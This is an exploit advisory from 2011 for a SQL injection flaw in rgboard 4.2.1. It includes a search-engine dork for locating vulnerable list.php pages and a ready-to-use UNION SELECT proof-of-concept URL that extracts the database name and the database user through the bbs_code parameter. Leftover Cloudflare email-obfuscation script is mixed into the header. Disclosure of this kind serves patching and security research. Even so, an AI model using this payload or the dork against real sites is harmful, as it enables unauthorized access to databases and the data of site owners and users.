* Exploit Title: rgboard SQL Injection Vulnerability
* inurl: rgboard4/list.php |
* Date: 2011. 6.22 |
* <script type="text/javascript"> |
/* <![CDATA[ */ |
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); |
/* ]]> */ |
</script>) |
* Test on : Windowss XP SP3 |
* Software Link: http://v4.rgboard.com/rg4_board/down.php?&bbs_code=rgboard_pds&bd_num=1757&key=0&mode=down |
* Version: rgboard 4.2.1 |
* SQL Injection |
|
http://[target]/list.php?bbs_code=notice[SQL] |
* POC : http://site/list.php?bbs_code=notice'+and+1=2+union+select+1%2C2%2C3%
2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17
%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C
database()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))
%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23